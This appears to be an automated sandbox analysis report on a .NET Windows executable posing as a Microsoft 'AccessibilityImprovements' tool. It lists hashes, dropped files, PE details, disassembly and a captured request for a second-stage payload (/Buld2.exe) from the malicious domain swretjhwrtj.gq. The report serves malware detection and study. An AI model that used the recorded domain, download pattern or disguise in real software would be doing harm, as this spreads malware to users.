Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
swretjhwrtj.gq	3wFnAPAYUv.exe	Get hash	malicious	Browse	104.21.86.82
	t7p1ekMto0.exe	Get hash	malicious	Browse	172.67.216.236
	FhKq0cr6Av.exe	Get hash	malicious	Browse	104.21.86.82
	p3Xn5MS40D.exe	Get hash	malicious	Browse	104.21.86.82
	zXvieSHD5r.exe	Get hash	malicious	Browse	104.21.86.82
	6aymsd5QOF.exe	Get hash	malicious	Browse	104.21.86.82
	vohLQYgpj0.exe	Get hash	malicious	Browse	172.67.216.236
	nd4GzpmV60.exe	Get hash	malicious	Browse	104.21.86.82
	n2WWbWDvhk.exe	Get hash	malicious	Browse	104.21.86.82
	GzsKHwvBmG.exe	Get hash	malicious	Browse	172.67.216.236
	69CDTt1pad.exe	Get hash	malicious	Browse	172.67.216.236

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	del.htm	Get hash	malicious	Browse	104.16.19.94
	bmqeXzXNCX.exe	Get hash	malicious	Browse	172.67.188.154
	del.htm	Get hash	malicious	Browse	104.16.18.94
	3wFnAPAYUv.exe	Get hash	malicious	Browse	104.21.86.82
	tSXyqrumfM.exe	Get hash	malicious	Browse	104.23.98.190
	meEHCYTyAy.exe	Get hash	malicious	Browse	104.21.1.69
	.HTM	Get hash	malicious	Browse	104.16.19.94
	l3DR3wZJlL.exe	Get hash	malicious	Browse	162.159.129.233
	zw9oqL7Fpb.exe	Get hash	malicious	Browse	104.21.19.200
	loligang.arm	Get hash	malicious	Browse	104.31.18.180
	MeqPU3v7Mi.exe	Get hash	malicious	Browse	66.235.200.147
	lates.doc	Get hash	malicious	Browse	104.21.34.19
	Bildirim_Cubugu.apk	Get hash	malicious	Browse	172.67.189.217
	QUOTE 24082021.exe	Get hash	malicious	Browse	104.21.19.200
	t7p1ekMto0.exe	Get hash	malicious	Browse	172.67.188.154
	FhKq0cr6Av.exe	Get hash	malicious	Browse	104.21.86.82
	D190a.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Details-7125618_20210823.xlsb	Get hash	malicious	Browse	162.159.130.233
	Details-7125618_20210823.xlsb	Get hash	malicious	Browse	162.159.129.233

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\108b7f4f-5686-4e2a-8f63-f5f2c7239d1c\ .dll	3wFnAPAYUv.exe	Get hash	malicious	Browse
	t7p1ekMto0.exe	Get hash	malicious	Browse
	FhKq0cr6Av.exe	Get hash	malicious	Browse
	p3Xn5MS40D.exe	Get hash	malicious	Browse
	zXvieSHD5r.exe	Get hash	malicious	Browse
	6aymsd5QOF.exe	Get hash	malicious	Browse
	vohLQYgpj0.exe	Get hash	malicious	Browse
	nd4GzpmV60.exe	Get hash	malicious	Browse
	n2WWbWDvhk.exe	Get hash	malicious	Browse
	GzsKHwvBmG.exe	Get hash	malicious	Browse
	69CDTt1pad.exe	Get hash	malicious	Browse
	DUsM8INDiD.exe	Get hash	malicious	Browse
	cfcb21c8c129c8c2c525ecfac8bd883260eda6038e399.exe	Get hash	malicious	Browse
	crat.exe	Get hash	malicious	Browse
	nope.exe	Get hash	malicious	Browse
	Rage Injector v2.0.exe	Get hash	malicious	Browse
	HVHTOOLS.exe	Get hash	malicious	Browse
	_[blood] 23_41_17.exe.o.exe	Get hash	malicious	Browse
	AVRage Injector v 2.0.exe.o.exe	Get hash	malicious	Browse
	cookies fix.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bPNK0VeG79.exe.log Download File
Process:	C:\Users\user\Desktop\bPNK0VeG79.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.367899416177239
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
MD5:	7115A3215A4C22EF20AB9AF4160EE8F5
SHA1:	A4CAB34355971C1FBAABECEFA91458C4936F2C24
SHA-256:	A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
SHA-512:	2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\108b7f4f-5686-4e2a-8f63-f5f2c7239d1c\ .dll Download File
Process:	C:\Users\user\Desktop\bPNK0VeG79.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	145173
Entropy (8bit):	6.364932145314629
Encrypted:	false
SSDEEP:	3072:2vHGxvpTI1xUSnsEYVA+9yaJAUiXbNxqAmi3zGDm/8S:mmwWmrtPTj9jGq/8S
MD5:	E8641F344213CA05D8B5264B5F4E2DEE
SHA1:	96729E31F9B805800B2248FD22A4B53E226C8309
SHA-256:	85E82B9E9200E798E8F434459EACEE03ED9818CC6C9A513FE083E72D48884E24
SHA-512:	3130F32C100ECB97083AD8AC4C67863E9CEED3A9B06FC464D1AEEAEC389F74C8BF56F4CE04F6450FD2CC0FA861D085101C433CFA4BEC3095F8EBEEB53B739109
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: 3wFnAPAYUv.exe, Detection: malicious, Browse Filename: t7p1ekMto0.exe, Detection: malicious, Browse Filename: FhKq0cr6Av.exe, Detection: malicious, Browse Filename: p3Xn5MS40D.exe, Detection: malicious, Browse Filename: zXvieSHD5r.exe, Detection: malicious, Browse Filename: 6aymsd5QOF.exe, Detection: malicious, Browse Filename: vohLQYgpj0.exe, Detection: malicious, Browse Filename: nd4GzpmV60.exe, Detection: malicious, Browse Filename: n2WWbWDvhk.exe, Detection: malicious, Browse Filename: GzsKHwvBmG.exe, Detection: malicious, Browse Filename: 69CDTt1pad.exe, Detection: malicious, Browse Filename: DUsM8INDiD.exe, Detection: malicious, Browse Filename: cfcb21c8c129c8c2c525ecfac8bd883260eda6038e399.exe, Detection: malicious, Browse Filename: crat.exe, Detection: malicious, Browse Filename: nope.exe, Detection: malicious, Browse Filename: Rage Injector v2.0.exe, Detection: malicious, Browse Filename: HVHTOOLS.exe, Detection: malicious, Browse Filename: _[blood] 23_41_17.exe.o.exe, Detection: malicious, Browse Filename: AVRage Injector v 2.0.exe.o.exe, Detection: malicious, Browse Filename: cookies fix.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=.6.\.e.\.e.\.e.%e.\.e.$.e.\.e.\.e.\.e..e.\.e...e.\.e..%e.\.e...e.\.e...e.\.e...e.\.eRich.\.e........................PE..d.....v\.........." .........0......P................................................9....@.............................................s.......x....@.......0...............P..........................................p.......................`....................text............................... ..`.rdata..............................@..@.data...X.... ......................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc...!...P...!..................`...........................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.39924887419577
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	bPNK0VeG79.exe
File size:	569344
MD5:	19e4c4f601f1459b6755776c7aec2604
SHA1:	71d8398652a891d09492db64bc1458349ba4cdbc
SHA256:	9460ffe580332fe64bb4f35bb63dc6a4302f3613718a04dc0986cea989160039
SHA512:	f3142590ecc73245295b1cf0f2b4188fa547f35adb2103efba55db8629c730727ac0beef73034950aec0e87297f7be1acfb2bcffc6b238c4386499356f527696
SSDEEP:	12288:KsztnZfvdeneL2iNF2iNi4QissaMJcR/V:KspZF1j1esId
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	f8d2a86961e8dc78

Static PE Info

General
Entrypoint:	0x489dba
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xF3E88B15 [Thu Sep 3 07:24:05 2099 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add dword ptr [eax], 9DFC0000h
or byte ptr [eax], al
cld
jnle 00007F6830B8559Ah
add byte ptr [edx+53h], dl
inc esp
push ebx
cli
aas
mov ebp, 8490418Eh
inc ebp
mov dh, byte ptr [edx+4EBE67CFh]
lahf
mov byte ptr [ecx], 00000000h
add byte ptr [eax], al
inc ebx
cmp bl, byte ptr [ebp+edx*2+73h]
jc 00007F6830B85606h
pop esp
inc ecx
insb
js 00007F6830B8560Bh
pop esp
inc esp
jnc 00007F6830B855FEh
je 00007F6830B85601h
jo 00007F6830B855EEh
push ecx
push edi
inc ebp
push edx
pop esp
inc esp
jbe 00007F6830B855FCh
arpl word ptr [ebp+43h], sp
jc 00007F6830B855F7h
outsb
je 00007F6830B855FBh
popad
insb
inc esp
jo 00007F6830B855FFh
outsd
jns 00007F6830B855FFh
outsb
je 00007F6830B855EEh
bound ebp, dword ptr [ecx+6Eh]
pop esp
push edx
insb
popad
jnc 00007F6830B855F7h
pop esp
push ebx
arpl word ptr [ebp+72h], si
pop esp
inc ecx
arpl word ptr [ebx+65h], sp
jnc 00007F6830B85605h
imul esp, dword ptr [edx+69h], 7974696Ch
dec ecx
insd
jo 00007F6830B85604h
outsd
jbe 00007F6830B855F7h
insd
outsb
je 00007F6830B85605h
jo 00007F6830B855F7h
bound eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x89d60	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8a000	0x2a4c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x89de0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x87e80	0x88000	False	0.500800637638	data	7.40200609771	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8a000	0x2a4c	0x2c00	False	0.862127130682	data	7.40349726732	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8e000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x8a130	0x22cd	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x8c400	0x14	data
RT_VERSION	0x8c414	0x44a	data
RT_MANIFEST	0x8c860	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Microsoft Corporation. All rights reserved.
Assembly Version	16.0.100.0
InternalName	AccessibilityImprovements.exe
FileVersion	16.0.100.0
CompanyName	AccessibilityImprovements
LegalTrademarks
Comments	AccessibilityImprovements
ProductName	AccessibilityImprovements
ProductVersion	16.0.100.0
FileDescription	AccessibilityImprovements
OriginalFilename	AccessibilityImprovements.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 17:02:28.542000055 CEST	49685	80	192.168.2.6	172.67.216.236
Aug 24, 2021 17:02:28.558249950 CEST	80	49685	172.67.216.236	192.168.2.6
Aug 24, 2021 17:02:28.558614016 CEST	49685	80	192.168.2.6	172.67.216.236
Aug 24, 2021 17:02:28.560537100 CEST	49685	80	192.168.2.6	172.67.216.236
Aug 24, 2021 17:02:28.576802969 CEST	80	49685	172.67.216.236	192.168.2.6
Aug 24, 2021 17:02:28.588551998 CEST	80	49685	172.67.216.236	192.168.2.6
Aug 24, 2021 17:02:28.588587046 CEST	80	49685	172.67.216.236	192.168.2.6
Aug 24, 2021 17:02:28.588598967 CEST	80	49685	172.67.216.236	192.168.2.6
Aug 24, 2021 17:02:28.588609934 CEST	80	49685	172.67.216.236	192.168.2.6
Aug 24, 2021 17:02:28.588622093 CEST	80	49685	172.67.216.236	192.168.2.6
Aug 24, 2021 17:02:28.589253902 CEST	49685	80	192.168.2.6	172.67.216.236
Aug 24, 2021 17:02:28.817972898 CEST	49685	80	192.168.2.6	172.67.216.236

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 17:02:28.434186935 CEST	60892	53	192.168.2.6	8.8.8.8
Aug 24, 2021 17:02:28.520318031 CEST	53	60892	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 24, 2021 17:02:28.434186935 CEST	192.168.2.6	8.8.8.8	0x5507	Standard query (0)	swretjhwrtj.gq	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 24, 2021 17:02:28.520318031 CEST	8.8.8.8	192.168.2.6	0x5507	No error (0)	swretjhwrtj.gq		172.67.216.236	A (IP address)	IN (0x0001)
Aug 24, 2021 17:02:28.520318031 CEST	8.8.8.8	192.168.2.6	0x5507	No error (0)	swretjhwrtj.gq		104.21.86.82	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

swretjhwrtj.gq

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49685	172.67.216.236	80	C:\Users\user\Desktop\bPNK0VeG79.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 17:02:28.560537100 CEST	53	OUT	GET /Buld2.exe HTTP/1.1 Host: swretjhwrtj.gq Connection: Keep-Alive
Aug 24, 2021 17:02:28.588551998 CEST	54	IN	HTTP/1.1 200 OK Date: Tue, 24 Aug 2021 15:02:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B7aPHHIA1nHaK3nGES0ICwPCO8cs7YN8y7gewd0njRPRRgdHHrZDr0LPPL%2BXye0wqHZB16%2FdfTm4DHAPdBuuC0zN7MxdrQE9xmNV1R9NqZpyU8y0beWZvFO%2FMyla44Cr8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683d763c8b2b16ee-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 30 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 Data Ascii: 10d2<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet
Aug 24, 2021 17:02:28.588587046 CEST	56	IN	Data Raw: 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 Data Ascii: " id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projecti
Aug 24, 2021 17:02:28.588598967 CEST	57	IN	Data Raw: 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 66 6c 61 67 67 65 64 20 61 73 20 70 68 69 73 68 69 6e 67 2e 20 50 68 69 73 68 69 6e 67 20 69 73 20 61 6e 20 61 74 74 65 6d 70 74 20 Data Ascii: 2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form actio
Aug 24, 2021 17:02:28.588609934 CEST	58	IN	Data Raw: 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 72 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 30 20 73 6d 3a 70 79 2d 34 20 73 6d 3a 70 78 2d 38 20 6d 78 2d 61 75 74 6f 20 74 65 78 74 2d 63 65 6e 74 65 Data Ascii: f-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <stron
Aug 24, 2021 17:02:28.588622093 CEST	58	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: bPNK0VeG79.exe PID: 2872 Parent PID: 5992

General

Start time:	17:02:26
Start date:	24/08/2021
Path:	C:\Users\user\Desktop\bPNK0VeG79.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\bPNK0VeG79.exe'
Imagebase:	0xb70000
File size:	569344 bytes
MD5 hash:	19E4C4F601F1459B6755776C7AEC2604
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: bPNK0VeG79.exe PID: 2872 Parent PID: 5992 bPNK0VeG79.exeCOMMON

Executed Functions

Function 00007FFD7ACC83A0, Relevance: 45.8, APIs: 11, Strings: 15, Instructions: 259memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FFD7ACC8418

Part of subcall function 00007FFD7ACCEEF0: lstrcatW.KERNEL32 ref: 00007FFD7ACCEF08

GetCurrentProcess.KERNEL32 ref: 00007FFD7ACC8478
GetFileVersionInfoSizeW.VERSION ref: 00007FFD7ACC84E3
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC84F8
HeapAlloc.KERNEL32 ref: 00007FFD7ACC850E
GetFileVersionInfoW.VERSION ref: 00007FFD7ACC8533
VerQueryValueA.VERSION ref: 00007FFD7ACC856C
LoadLibraryW.KERNEL32 ref: 00007FFD7ACC87FE
GetProcAddress.KERNEL32 ref: 00007FFD7ACC8823
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC88FB
HeapFree.KERNEL32 ref: 00007FFD7ACC890E

Part of subcall function 00007FFD7ACCE770: lstrcmpA.KERNEL32 ref: 00007FFD7ACCE788

Strings

2.0.50727., xrefs: 00007FFD7ACC85D5
4.0.30319.17379, xrefs: 00007FFD7ACC8738
mscorjit.dll, xrefs: 00007FFD7ACC847E
2.0.50727.3053 (netfxsp.050727-3000), xrefs: 00007FFD7ACC8587
.text, xrefs: 00007FFD7ACC88DE
clrjit.dll, xrefs: 00007FFD7ACC841E
\StringFileInfo\040904b0\FileVersion, xrefs: 00007FFD7ACC8538
getJit, xrefs: 00007FFD7ACC8810
clrjit.dll, xrefs: 00007FFD7ACC844B
.text, xrefs: 00007FFD7ACC88BF
4.0.30319.17626, xrefs: 00007FFD7ACC8792
mscorjit.dll, xrefs: 00007FFD7ACC84AB
4.0.30319.17020 built by: FXM3REL, xrefs: 00007FFD7ACC870D
v4.0, xrefs: 00007FFD7ACC83DD
2.0.50727.3068 (QFE.050727-3000), xrefs: 00007FFD7ACC85AA

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: HeapProcess$CurrentFileInfoVersion$AddressAllocFreeLibraryLoadProcQuerySizeValuelstrcatlstrcmp
String ID: .text$.text$2.0.50727.$2.0.50727.3053 (netfxsp.050727-3000)$2.0.50727.3068 (QFE.050727-3000)$4.0.30319.17020 built by: FXM3REL$4.0.30319.17379$4.0.30319.17626$\StringFileInfo\040904b0\FileVersion$clrjit.dll$clrjit.dll$getJit$mscorjit.dll$mscorjit.dll$v4.0
API String ID: 1337683846-2252446965
Opcode ID: bb187277ca8f38f51487109d30264a9a591c1c1d6d325c10b0e6afcce02c8b13
Instruction ID: 8ab90d2a38a6a5c8fef11470c1036c1b55dea78b9be1fe6cd8d7c8509d34f9ac
Opcode Fuzzy Hash: bb187277ca8f38f51487109d30264a9a591c1c1d6d325c10b0e6afcce02c8b13
Instruction Fuzzy Hash: 97E1083A728AC595EA74DB15E4603AEB3A1FBC4788F414072DA8D8BB68DF7CD545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC4F70, Relevance: 15.1, APIs: 10, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

EnumProcessModules.PSAPI ref: 00007FFD7ACC4FB7
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC4FDB
HeapAlloc.KERNEL32 ref: 00007FFD7ACC4FF1
EnumProcessModules.PSAPI ref: 00007FFD7ACC5013
GetModuleInformation.PSAPI ref: 00007FFD7ACC5081
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC50C7
HeapFree.KERNEL32 ref: 00007FFD7ACC50D7
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC50F7
HeapFree.KERNEL32 ref: 00007FFD7ACC5107
VirtualQuery.KERNEL32 ref: 00007FFD7ACC513A

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
